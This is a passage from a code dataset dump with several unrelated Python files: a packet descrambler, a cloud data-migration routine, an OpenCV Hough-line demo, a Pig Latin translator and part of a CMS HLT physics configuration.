\tpackets.update({key: [val]})\n msg = ''\n\n for key, val in sorted(packets.items()):\n max_ = 0\n most = ''\n for value in val:\n if max_ < val.count(value):\n most = value\n max_ = val.count(value)\n if max_ * 2 >= n:\n msg += most\n lst = list(sorted(packets.keys()))\n start = lst[0]\n end 
end = lst[-1]\n index = start + (end - start) // 2\n #nonsequential sequences\n if index > 1:\n msg = ''\n if len(msg) > 1 and msg[0] == \"#\":\n msg = ''\n if n != sum(packets.keys()) and sum(packets.keys()) != 0:\n if not len(msg) > n:\n msg = ''\n return msg\n","sub_path":"Company_Challenges/SpaceX/packetDescrambler.py","file_name":"packetDescrambler.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"253785876","text":"import packages.ipm_cloud_postgresql.model as model\nimport bth.interacao_cloud as interacao_cloud\nimport json\nimport logging\nfrom datetime import datetime\n\ntipo_registro = 'processos-cloud'\nsistema = 304\nlimite_lote = 1000\nurl = \"https://api.protocolo.betha.cloud/protocolo/service-layer/v1/api/processos\"\n\n\ndef iniciar_processo_busca(params_exec, ano, *args, **kwargs):\n print(\"GOT STUCK INSIDE 0\")\n print('- Starting data search.')\n lista_controle_migracao = []\n hoje = datetime.now().strftime(\"%Y-%m-%d\")\n contador = 0\n print(\"GOT STUCK INSIDE 1\")\n req_res = interacao_cloud.busca_dados_cloud(params_exec,\n url=url,\n tipo_registro=tipo_registro,\n tamanho_lote=limite_lote)\n\n print(req_res)\n print(\"GOT STUCK INSIDE 2\")\n for item in req_res:\n idGerado = item['id']\n chave_dsk1 = item['numeroProcesso']\n\n hash_chaves = model.gerar_hash_chaves(sistema, tipo_registro, str(chave_dsk1).replace(\"-\", \"/\"))\n # print(idGerado)\n lista_controle_migracao.append({\n 'sistema': sistema,\n 'tipo_registro': tipo_registro,\n 'hash_chave_dsk': hash_chaves,\n 'descricao_tipo_registro': 'Busca de processos no cloud',\n 'id_gerado': idGerado,\n 'i_chave_dsk1': chave_dsk1\n })\n contador += 1\n # print(lista_controle_migracao)\n model.insere_tabela_controle_migracao_auxiliar(params_exec, lista_req=lista_controle_migracao)\n print('- Data search finished.')\n","sub_path":"packages/ipm_cloud_postgresql/protocolo/rotinas_envio/buscaProcessosNew.py","file_name":"buscaProcessosNew.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"466462726","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('./imgs/CheeseBoard.jpg')\ncv2.imshow(\"Image\", img)\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"Image - GreyScale\",gray)\ncv2.waitKey(0)\n\nedges = cv2.Canny(gray, 150, 250, apertureSize=3)\ncv2.imshow(\"edges - after canny\", edges)\ncv2.waitKey(0)\n\n\nlines = cv2.HoughLines(edges, 1, np.pi / 180, 200)\nfor rho, theta in lines[0]:\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b)) \n y1 = int(y0 + 1000 * (a))\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * (a))\n\n cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\n\ncv2.imshow(\"imgafter\", img)\ncv2.waitKey(0)\ncv2.imwrite('./imgs/CheeseBoard_Out.jpg', img)\n\n\n","sub_path":"Old/HoughLines.py","file_name":"HoughLines.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"481346024","text":"print(\"This code doesn't handle upper-case letters or punctuation.\")\nvowels = \"eaoui\"\nconsonants = \"bcdfghjklmnpqrstvwxyz\"\n\ndef get_consonant_prefix(word):\n consonants = \"bcdfghjklmnpqrstvwxyz\"\n i = 0\n consonant_prefix = \"\"\n while (i < len(word) and consonants.find(word[i]) > -1):\n consonant_prefix += word[i]\n i += 1\n return consonant_prefix\n\n
def get_tail(word):\n consonants = \"bcdfghjklmnpqrstvwxyz\"\n i = 0\n consonant_prefix = \"\"\n while (i < len(word) and consonants.find(word[i]) > -1):\n consonant_prefix += word[i]\n i += 1\n tail = word[i:]\n return tail\n\n#Enter a sentence here for it to be converted to pig-latin.\nprint('''\nit could be something like \"all this pig latin is making me hungry\"\n''')\nsentence = input(\"Give me a msg to translate: \")\npig_sentence = \"\"\nfor word in sentence.split(\" \"):\n if(vowels.find(word[0]) > -1):\n pig_sentence = pig_sentence + word + \"yay \"\n else:\n pig_sentence = pig_sentence + get_tail(word) + get_consonant_prefix(word) + \"ay \"\nprint(pig_sentence)","sub_path":"Piglatin_Translator.py","file_name":"Piglatin_Translator.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"415626731","text":"# /user/cer/CMSSW_3_3_2/HLT_ppActivityTrig/V3 (CMSSW_3_3_2_HLT3)\n\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process( \"HLT\" )\n\nprocess.HLTConfigVersion = cms.PSet(\n tableName = cms.string('/user/cer/CMSSW_3_3_2/HLT_ppActivityTrig/V3')\n)\n\nprocess.options = cms.untracked.PSet( Rethrow = cms.untracked.vstring( 'ProductNotFound',\n 'TooManyProducts',\n 'TooFewProducts' ) )\n\nprocess.source = cms.Source( \"PoolSource\",\n fileNames = cms.untracked.vstring( '/store/relval/CMSSW_3_3_0/RelValHydjetQ_MinBias_4TeV/GEN-SIM-RAW/MC_31X_V9-v2/0003/E0C659F9-49BD-DE11-BD8B-001731AF68B3.root' )\n)\n\nprocess.essourceSev = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"HcalSeverityLevelComputerRcd\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nprocess.BTagRecord = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"JetTagComputerRecord\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nprocess.GlobalTag = cms.ESSource( \"PoolDBESSource\",\n BlobStreamerName = cms.untracked.string( \"TBufferBlobStreamingService\" ),\n connect = cms.string( \"frontier://(proxyurl=http://localhost:3128)(serverurl=http://localhost:8000/FrontierOnProd)(serverurl=http://localhost:8000/FrontierOnProd)(retrieve-ziplevel=0)/CMS_COND_31X_GLOBALTAG\" ),\n globaltag = cms.string( \"GR09_H_V3::All\" ),\n appendToDataLabel = cms.string( \"\" ),\n DBParameters = cms.PSet( \n authenticationPath = cms.untracked.string( \".\" ),\n messageLevel = cms.untracked.int32( 0 ),\n connectionTimeOut = cms.untracked.int32( 0 ),\n connectionRetrialPeriod = cms.untracked.int32( 10 ),\n connectionRetrialTimeOut = cms.untracked.int32( 60 ),\n enableConnectionSharing = cms.untracked.bool( True ),\n enableReadOnlySessionOnUpdateConnection = cms.untracked.bool( False ),\n enablePoolAutomaticCleanUp = cms.untracked.bool( False ),\n idleConnectionCleanupPeriod = cms.untracked.int32( 10 )\n ),\n toGet = cms.VPSet( \n ),\n timetype = cms.string( \"runnumber\" )\n)\nprocess.HepPDTESSource = cms.ESSource( \"HepPDTESSource\",\n pdtFileName = cms.FileInPath( \"SimGeneral/HepPDTESSource/data/pythiaparticle.tbl\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.L2RelativeCorrectionService = cms.ESSource( \"L2RelativeCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n tagName = cms.string( \"Summer08_L2Relative_IC5Calo\" ),\n label = cms.string( \"L2RelativeJetCorrector\" )\n)\nprocess.MCJetCorrectorIcone5HF07 = cms.ESSource( \"L2RelativeCorrectionService\",\n appendToDataLabel 
= cms.string( \"\" ),\n tagName = cms.string( \"HLT_L2Relative\" ),\n label = cms.string( \"MCJetCorrectorIcone5HF07\" )\n)\nprocess.MCJetCorrectorIcone5Unit = cms.ESSource( \"L2RelativeCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n tagName = cms.string( \"HLT_L2RelativeFlat\" ),\n label = cms.string( \"MCJetCorrectorIcone5Unit\" )\n)\nprocess.L3AbsoluteCorrectionService = cms.ESSource( \"L3AbsoluteCorrectionService\",\n appendToDataLabel = cms.string( \"\" ),\n tagName = cms.string( \"Summer08_L3Absolute_IC5Calo\" ),\n label = cms.string( \"L3AbsoluteJetCorrector\" )\n)\nprocess.MCJetCorrectorIcone5 = cms.ESSource( \"JetCorrectionServiceChain\",\n label = cms.string( \"MCJetCorrectorIcone5\" ),\n appendToDataLabel = cms.string( \"\" ),\n correctors = cms.vstring( 'L2RelativeJetCorrector',\n 'L3AbsoluteJetCorrector' )\n)\nprocess.SiStripQualityFakeESSource = cms.ESSource( \"SiStripQualityFakeESSource\" )\nprocess.XMLIdealGeometryESSource = cms.ESSource( \"XMLIdealGeometryESSource\",\n rootNodeName = cms.string( \"cms:OCMS\" ),\n appendToDataLabel = cms.string( \"\" ),\n geomXMLFiles = ( cms.vstring( 'Geometry/CMSCommonData/data/materials.xml',\n 'Geometry/CMSCommonData/data/rotations.xml',\n 'Geometry/CMSCommonData/data/extend/cmsextent.xml',\n 'Geometry/CMSCommonData/data/cms.xml',\n 'Geometry/CMSCommonData/data/cmsMother.xml',\n 'Geometry/CMSCommonData/data/cmsTracker.xml',\n 'Geometry/CMSCommonData/data/caloBase.xml',\n 'Geometry/CMSCommonData/data/cmsCalo.xml',\n 'Geometry/CMSCommonData/data/muonBase.xml',\n 'Geometry/CMSCommonData/data/cmsMuon.xml',\n 'Geometry/CMSCommonData/data/mgnt.xml',\n 'Geometry/CMSCommonData/data/beampipe.xml',\n 'Geometry/CMSCommonData/data/cmsBeam.xml',\n 'Geometry/CMSCommonData/data/muonMB.xml',\n 'Geometry/CMSCommonData/data/muonMagnet.xml',\n 'Geometry/CMSCommonData/data/cavern.xml',\n 'Geometry/TrackerCommonData/data/pixfwdMaterials.xml',\n 'Geometry/TrackerCommonData/data/pixfwdCommon.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq1x2.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq1x5.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq2x3.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq2x4.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPlaq2x5.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPanelBase.xml',\n 'Geometry/TrackerCommonData/data/pixfwdPanel.xml',\n 'Geometry/TrackerCommonData/data/pixfwdBlade.xml',\n 'Geometry/TrackerCommonData/data/pixfwdNipple.xml',\n 'Geometry/TrackerCommonData/data/pixfwdDisk.xml',\n 'Geometry/TrackerCommonData/data/pixfwdCylinder.xml',\n 'Geometry/TrackerCommonData/data/pixfwd.xml',\n 'Geometry/TrackerCommonData/data/pixbarmaterial.xml',\n 'Geometry/TrackerCommonData/data/pixbarladder.xml',\n 'Geometry/TrackerCommonData/data/pixbarladderfull.xml',\n 'Geometry/TrackerCommonData/data/pixbarladderhalf.xml',\n 'Geometry/TrackerCommonData/data/pixbarlayer.xml',\n 'Geometry/TrackerCommonData/data/pixbarlayer0.xml',\n 'Geometry/TrackerCommonData/data/pixbarlayer1.xml',\n 'Geometry/TrackerCommonData/data/pixbarlayer2.xml',\n 'Geometry/TrackerCommonData/data/pixbar.xml',\n 'Geometry/TrackerCommonData/data/tibtidcommonmaterial.xml',\n 'Geometry/TrackerCommonData/data/tibmaterial.xml',\n 'Geometry/TrackerCommonData/data/tibmodpar.xml',\n 'Geometry/TrackerCommonData/data/tibmodule0.xml',\n 'Geometry/TrackerCommonData/data/tibmodule0a.xml',\n 'Geometry/TrackerCommonData/data/tibmodule0b.xml',\n 'Geometry/TrackerCommonData/data/tibmodule2.xml',\n 
'Geometry/TrackerCommonData/data/tibstringpar.xml',\n 'Geometry/TrackerCommonData/data/tibstring0ll.xml',\n 'Geometry/TrackerCommonData/data/tibstring0lr.xml',\n 'Geometry/TrackerCommonData/data/tibstring0ul.xml',\n 'Geometry/TrackerCommonData/data/tibstring0ur.xml',\n 'Geometry/TrackerCommonData/data/tibstring0.xml',\n 'Geometry/TrackerCommonData/data/tibstring1ll.xml',\n 'Geometry/TrackerCommonData/data/tibstring1lr.xml',\n 'Geometry/TrackerCommonData/data/tibstring1ul.xml',\n 'Geometry/TrackerCommonData/data/tibstring1ur.xml',\n 'Geometry/TrackerCommonData/data/tibstring1.xml',\n 'Geometry/TrackerCommonData/data/tibstring2ll.xml',\n 'Geometry/TrackerCommonData/data/tibstring2lr.xml',\n 'Geometry/TrackerCommonData/data/tibstring2ul.xml',\n 'Geometry/TrackerCommonData/data/tibstring2ur.xml',\n 'Geometry/TrackerCommonData/data/tibstring2.xml',\n 'Geometry/TrackerCommonData/data/tibstring3ll.xml',\n 'Geometry/TrackerCommonData/data/tibstring3lr.xml',\n 'Geometry/TrackerCommonData/data/tibstring3ul.xml',\n 'Geometry/TrackerCommonData/data/tibstring3ur.xml',\n 'Geometry/TrackerCommonData/data/tibstring3.xml',\n 'Geometry/TrackerCommonData/data/tiblayerpar.xml',\n 'Geometry/TrackerCommonData/data/tiblayer0.xml',\n 'Geometry/TrackerCommonData/data/tiblayer1.xml',\n 'Geometry/TrackerCommonData/data/tiblayer2.xml',\n 'Geometry/TrackerCommonData/data/tiblayer3.xml',\n 'Geometry/TrackerCommonData/data/tib.xml',\n 'Geometry/TrackerCommonData/data/tidmaterial.xml',\n 'Geometry/TrackerCommonData/data/tidmodpar.xml',\n 'Geometry/TrackerCommonData/data/tidmodule0.xml',\n 'Geometry/TrackerCommonData/data/tidmodule0r.xml',\n 'Geometry/TrackerCommonData/data/tidmodule0l.xml',\n 'Geometry/TrackerCommonData/data/tidmodule1.xml',\n 'Geometry/TrackerCommonData/data/tidmodule1r.xml',\n 'Geometry/TrackerCommonData/data/tidmodule1l.xml',\n 'Geometry/TrackerCommonData/data/tidmodule2.xml',\n 'Geometry/TrackerCommonData/data/tidringpar.xml',\n 'Geometry/TrackerCommonData/data/tidring0.xml',\n 'Geometry/TrackerCommonData/data/tidring0f.xml',\n 'Geometry/TrackerCommonData/data/tidring0b.xml',\n 'Geometry/TrackerCommonData/data/tidring1.xml',\n 'Geometry/TrackerCommonData/data/tidring1f.xml',\n 'Geometry/TrackerCommonData/data/tidring1b.xml',\n 'Geometry/TrackerCommonData/data/tidring2.xml',\n 'Geometry/TrackerCommonData/data/tid.xml',\n 'Geometry/TrackerCommonData/data/tidf.xml',\n 'Geometry/TrackerCommonData/data/tidb.xml',\n 'Geometry/TrackerCommonData/data/tibtidservices.xml',\n 'Geometry/TrackerCommonData/data/tibtidservicesf.xml',\n 'Geometry/TrackerCommonData/data/tibtidservicesb.xml',\n 'Geometry/TrackerCommonData/data/tobmaterial.xml',\n 'Geometry/TrackerCommonData/data/tobmodpar.xml',\n 'Geometry/TrackerCommonData/data/tobmodule0.xml',\n 'Geometry/TrackerCommonData/data/tobmodule2.xml',\n 'Geometry/TrackerCommonData/data/tobmodule4.xml',\n 'Geometry/TrackerCommonData/data/tobrodpar.xml',\n 'Geometry/TrackerCommonData/data/tobrod0c.xml',\n 'Geometry/TrackerCommonData/data/tobrod0l.xml',\n 'Geometry/TrackerCommonData/data/tobrod0h.xml',\n 'Geometry/TrackerCommonData/data/tobrod0.xml',\n 'Geometry/TrackerCommonData/data/tobrod1l.xml',\n 'Geometry/TrackerCommonData/data/tobrod1h.xml',\n 'Geometry/TrackerCommonData/data/tobrod1.xml',\n 'Geometry/TrackerCommonData/data/tobrod2c.xml',\n 'Geometry/TrackerCommonData/data/tobrod2l.xml',\n 'Geometry/TrackerCommonData/data/tobrod2h.xml',\n 'Geometry/TrackerCommonData/data/tobrod2.xml',\n 'Geometry/TrackerCommonData/data/tobrod3l.xml',\n 
'Geometry/TrackerCommonData/data/tobrod3h.xml',\n 'Geometry/TrackerCommonData/data/tobrod3.xml',\n 'Geometry/TrackerCommonData/data/tobrod4c.xml',\n 'Geometry/TrackerCommonData/data/tobrod4l.xml',\n 'Geometry/TrackerCommonData/data/tobrod4h.xml',\n 'Geometry/TrackerCommonData/data/tobrod4.xml',\n 'Geometry/TrackerCommonData/data/tobrod5l.xml',\n 'Geometry/TrackerCommonData/data/tobrod5h.xml',\n 'Geometry/TrackerCommonData/data/tobrod5.xml',\n 'Geometry/TrackerCommonData/data/tob.xml',\n 'Geometry/TrackerCommonData/data/tecmaterial.xml',\n 'Geometry/TrackerCommonData/data/tecmodpar.xml',\n 'Geometry/TrackerCommonData/data/tecmodule0.xml',\n 'Geometry/TrackerCommonData/data/tecmodule0r.xml',\n 'Geometry/TrackerCommonData/data/tecmodule0s.xml',\n 'Geometry/TrackerCommonData/data/tecmodule1.xml',\n 'Geometry/TrackerCommonData/data/tecmodule1r.xml',\n 'Geometry/TrackerCommonData/data/tecmodule1s.xml',\n 'Geometry/TrackerCommonData/data/tecmodule2.xml',\n 'Geometry/TrackerCommonData/data/tecmodule3.xml',\n 'Geometry/TrackerCommonData/data/tecmodule4.xml',\n 'Geometry/TrackerCommonData/data/tecmodule4r.xml',\n 'Geometry/TrackerCommonData/data/tecmodule4s.xml',\n 'Geometry/TrackerCommonData/data/tecmodule5.xml',\n 'Geometry/TrackerCommonData/data/tecmodule6.xml',\n 'Geometry/TrackerCommonData/data/tecpetpar.xml',\n 'Geometry/TrackerCommonData/data/tecring0.xml',\n 'Geometry/TrackerCommonData/data/tecring1.xml',\n 'Geometry/TrackerCommonData/data/tecring2.xml',\n 'Geometry/TrackerCommonData/data/tecring3.xml',\n 'Geometry/TrackerCommonData/data/tecring4.xml',\n 'Geometry/TrackerCommonData/data/tecring5.xml',\n 'Geometry/TrackerCommonData/data/tecring6.xml',\n 'Geometry/TrackerCommonData/data/tecring0f.xml',\n 'Geometry/TrackerCommonData/data/tecring1f.xml',\n 'Geometry/TrackerCommonData/data/tecring2f.xml',\n 'Geometry/TrackerCommonData/data/tecring3f.xml',\n 'Geometry/TrackerCommonData/data/tecring4f.xml',\n 'Geometry/TrackerCommonData/data/tecring5f.xml',\n 'Geometry/TrackerCommonData/data/tecring6f.xml',\n 'Geometry/TrackerCommonData/data/tecring0b.xml',\n 'Geometry/TrackerCommonData/data/tecring1b.xml',\n 'Geometry/TrackerCommonData/data/tecring2b.xml',\n 'Geometry/TrackerCommonData/data/tecring3b.xml',\n 'Geometry/TrackerCommonData/data/tecring4b.xml',\n 'Geometry/TrackerCommonData/data/tecring5b.xml',\n 'Geometry/TrackerCommonData/data/tecring6b.xml',\n 'Geometry/TrackerCommonData/data/tecpetalf.xml',\n 'Geometry/TrackerCommonData/data/tecpetalb.xml',\n 'Geometry/TrackerCommonData/data/tecpetal0.xml',\n 'Geometry/TrackerCommonData/data/tecpetal0f.xml',\n 'Geometry/TrackerCommonData/data/tecpetal0b.xml',\n 'Geometry/TrackerCommonData/data/tecpetal3.xml',\n 'Geometry/TrackerCommonData/data/tecpetal3f.xml',\n 'Geometry/TrackerCommonData/data/tecpetal3b.xml',\n 'Geometry/TrackerCommonData/data/tecpetal6f.xml',\n 'Geometry/TrackerCommonData/data/tecpetal6b.xml',\n 'Geometry/TrackerCommonData/data/tecpetal8f.xml',\n 'Geometry/TrackerCommonData/data/tecpetal8b.xml',\n 'Geometry/TrackerCommonData/data/tecwheel.xml',\n 'Geometry/TrackerCommonData/data/tecwheela.xml',\n 'Geometry/TrackerCommonData/data/tecwheelb.xml',\n 'Geometry/TrackerCommonData/data/tecwheelc.xml',\n 'Geometry/TrackerCommonData/data/tecwheeld.xml',\n 'Geometry/TrackerCommonData/data/tecwheel6.xml',\n 'Geometry/TrackerCommonData/data/tecservices.xml',\n 'Geometry/TrackerCommonData/data/tecbackplate.xml',\n 'Geometry/TrackerCommonData/data/tec.xml',\n 'Geometry/TrackerCommonData/data/trackermaterial.xml',\n 
'Geometry/TrackerCommonData/data/tracker.xml',\n 'Geometry/TrackerCommonData/data/trackerpixbar.xml',\n 'Geometry/TrackerCommonData/data/trackerpixfwd.xml',\n 'Geometry/TrackerCommonData/data/trackertibtidservices.xml',\n 'Geometry/TrackerCommonData/data/trackertib.xml',\n 'Geometry/TrackerCommonData/data/trackertid.xml',\n 'Geometry/TrackerCommonData/data/trackertob.xml',\n 'Geometry/TrackerCommonData/data/trackertec.xml',\n 'Geometry/TrackerCommonData/data/trackerbulkhead.xml',\n 'Geometry/TrackerCommonData/data/trackerother.xml',\n 'Geometry/EcalCommonData/data/eregalgo.xml',\n 'Geometry/EcalCommonData/data/ebalgo.xml',\n 'Geometry/EcalCommonData/data/ebcon.xml',\n 'Geometry/EcalCommonData/data/ebrot.xml',\n 'Geometry/EcalCommonData/data/eecon.xml',\n 'Geometry/EcalCommonData/data/eefixed.xml',\n 'Geometry/EcalCommonData/data/eehier.xml',\n 'Geometry/EcalCommonData/data/eealgo.xml',\n 'Geometry/EcalCommonData/data/escon.xml',\n 'Geometry/EcalCommonData/data/esalgo.xml',\n 'Geometry/EcalCommonData/data/eeF.xml',\n 'Geometry/EcalCommonData/data/eeB.xml',\n 'Geometry/HcalCommonData/data/hcalrotations.xml',\n 'Geometry/HcalCommonData/data/hcalalgo.xml',\n 'Geometry/HcalCommonData/data/hcalbarrelalgo.xml',\n 'Geometry/HcalCommonData/data/hcalendcapalgo.xml',\n 'Geometry/HcalCommonData/data/hcalouteralgo.xml',\n 'Geometry/HcalCommonData/data/hcalforwardalgo.xml',\n 'Geometry/HcalCommonData/data/hcalforwardfibre.xml',\n 'Geometry/HcalCommonData/data/hcalforwardmaterial.xml',\n 'Geometry/MuonCommonData/data/mbCommon.xml',\n 'Geometry/MuonCommonData/data/mb1.xml',\n 'Geometry/MuonCommonData/data/mb2.xml',\n 'Geometry/MuonCommonData/data/mb3.xml',\n 'Geometry/MuonCommonData/data/mb4.xml',\n 'Geometry/MuonCommonData/data/muonYoke.xml',\n 'Geometry/MuonCommonData/data/mf.xml',\n 'Geometry/ForwardCommonData/data/forward.xml',\n 'Geometry/ForwardCommonData/data/forwardshield.xml',\n 'Geometry/ForwardCommonData/data/brmrotations.xml',\n 'Geometry/ForwardCommonData/data/brm.xml',\n 'Geometry/ForwardCommonData/data/totemMaterials.xml',\n 'Geometry/ForwardCommonData/data/totemRotations.xml',\n 'Geometry/ForwardCommonData/data/totemt1.xml',\n 'Geometry/ForwardCommonData/data/totemt2.xml',\n 'Geometry/ForwardCommonData/data/ionpump.xml',\n 'Geometry/ForwardCommonData/data/castor.xml',\n 'Geometry/ForwardCommonData/data/zdcmaterials.xml',\n 'Geometry/ForwardCommonData/data/lumimaterials.xml',\n 'Geometry/ForwardCommonData/data/zdcrotations.xml',\n 'Geometry/ForwardCommonData/data/lumirotations.xml',\n 'Geometry/ForwardCommonData/data/zdc.xml',\n 'Geometry/ForwardCommonData/data/zdclumi.xml',\n 'Geometry/ForwardCommonData/data/cmszdc.xml',\n 'Geometry/MuonCommonData/data/muonNumbering.xml',\n 'Geometry/TrackerCommonData/data/trackerStructureTopology.xml',\n 'Geometry/TrackerSimData/data/trackersens.xml',\n 'Geometry/TrackerRecoData/data/trackerRecoMaterial.xml',\n 'Geometry/EcalSimData/data/ecalsens.xml',\n 'Geometry/HcalCommonData/data/hcalsens.xml',\n 'Geometry/HcalSimData/data/CaloUtil.xml',\n 'Geometry/MuonSimData/data/muonSens.xml',\n 'Geometry/DTGeometryBuilder/data/dtSpecsFilter.xml',\n 'Geometry/CSCGeometryBuilder/data/cscSpecsFilter.xml',\n 'Geometry/CSCGeometryBuilder/data/cscSpecs.xml',\n 'Geometry/RPCGeometryBuilder/data/RPCSpecs.xml',\n 'Geometry/ForwardCommonData/data/brmsens.xml',\n 'Geometry/ForwardSimData/data/totemsensT1.xml',\n 'Geometry/ForwardSimData/data/totemsensT2.xml',\n 'Geometry/ForwardSimData/data/castorsens.xml',\n 'Geometry/ForwardSimData/data/zdcsens.xml')+cms.vstring( 
'Geometry/HcalSimData/data/CaloProdCuts.xml',\n 'Geometry/HcalSimData/data/HcalProdCuts.xml',\n 'Geometry/EcalSimData/data/EcalProdCuts.xml',\n 'Geometry/TrackerSimData/data/trackerProdCuts.xml',\n 'Geometry/TrackerSimData/data/trackerProdCutsBEAM.xml',\n 'Geometry/MuonSimData/data/muonProdCuts.xml',\n 'Geometry/ForwardSimData/data/CastorProdCuts.xml',\n 'Geometry/ForwardSimData/data/zdcProdCuts.xml',\n 'Geometry/ForwardSimData/data/ForwardShieldProdCuts.xml',\n 'Geometry/CMSCommonData/data/FieldParameters.xml') )\n)\nprocess.eegeom = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"EcalMappingRcd\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nprocess.es_hardcode = cms.ESSource( \"HcalHardcodeCalibrations\",\n toGet = cms.untracked.vstring( 'GainWidths' ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.magfield = cms.ESSource( \"XMLIdealGeometryESSource\",\n rootNodeName = cms.string( \"cmsMagneticField:MAGF\" ),\n appendToDataLabel = cms.string( \"\" ),\n geomXMLFiles = cms.vstring( 'Geometry/CMSCommonData/data/normal/cmsextent.xml',\n 'Geometry/CMSCommonData/data/cms.xml',\n 'Geometry/CMSCommonData/data/cmsMagneticField.xml',\n 'MagneticField/GeomBuilder/data/MagneticFieldVolumes_1103l.xml',\n 'MagneticField/GeomBuilder/data/MagneticFieldParameters_07_2pi.xml' )\n)\n\nprocess.AnalyticalPropagator = cms.ESProducer( \"AnalyticalPropagatorESProducer\",\n ComponentName = cms.string( \"AnalyticalPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n MaxDPhi = cms.double( 1.6 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.AnyDirectionAnalyticalPropagator = cms.ESProducer( \"AnalyticalPropagatorESProducer\",\n ComponentName = cms.string( \"AnyDirectionAnalyticalPropagator\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n MaxDPhi = cms.double( 1.6 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.AutoMagneticFieldESProducer = cms.ESProducer( \"AutoMagneticFieldESProducer\",\n label = cms.untracked.string( \"\" ),\n valueOverride = cms.int32( -1 ),\n appendToDataLabel = cms.string( \"\" ),\n nominalCurrents = cms.untracked.vint32( -1, 0, 9558, 14416, 16819, 18268, 19262 ),\n mapLabels = cms.untracked.vstring( '090322_3_8t',\n '0t',\n '071212_2t',\n '071212_3t',\n '071212_3_5t',\n '090322_3_8t',\n '071212_4t' )\n)\nprocess.CSCGeometryESModule = cms.ESProducer( \"CSCGeometryESModule\",\n alignmentsLabel = cms.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n useRealWireGeometry = cms.bool( True ),\n useOnlyWiresInME1a = cms.bool( False ),\n useGangedStripsInME1a = cms.bool( True ),\n useCentreTIOffsets = cms.bool( False ),\n useDDD = cms.bool( True ),\n applyAlignment = cms.bool( True )\n)\nprocess.CaloGeometryBuilder = cms.ESProducer( \"CaloGeometryBuilder\",\n appendToDataLabel = cms.string( \"\" ),\n SelectedCalos = cms.vstring( 'HCAL',\n 'ZDC',\n 'EcalBarrel',\n 'EcalEndcap',\n 'EcalPreshower',\n 'TOWER' )\n)\nprocess.CaloTopologyBuilder = cms.ESProducer( \"CaloTopologyBuilder\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.CaloTowerConstituentsMapBuilder = cms.ESProducer( \"CaloTowerConstituentsMapBuilder\",\n MapFile = cms.untracked.string( \"Geometry/CaloTopology/data/CaloTowerEEGeometric.map.gz\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.CaloTowerHardcodeGeometryEP = cms.ESProducer( \"CaloTowerHardcodeGeometryEP\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.Chi2EstimatorForRefit = cms.ESProducer( 
\"Chi2MeasurementEstimatorESProducer\",\n ComponentName = cms.string( \"Chi2EstimatorForRefit\" ),\n MaxChi2 = cms.double( 100000.0 ),\n nSigma = cms.double( 3.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.Chi2MeasurementEstimator = cms.ESProducer( \"Chi2MeasurementEstimatorESProducer\",\n ComponentName = cms.string( \"Chi2\" ),\n MaxChi2 = cms.double( 30.0 ),\n nSigma = cms.double( 3.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.CkfTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"CkfTrajectoryBuilder\" ),\n updator = cms.string( \"KFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"Chi2\" ),\n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"\" ),\n trajectoryFilterName = cms.string( \"ckfBaseTrajectoryFilter\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.DTGeometryESModule = cms.ESProducer( \"DTGeometryESModule\",\n alignmentsLabel = cms.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n fromDDD = cms.bool( True ),\n applyAlignment = cms.bool( True 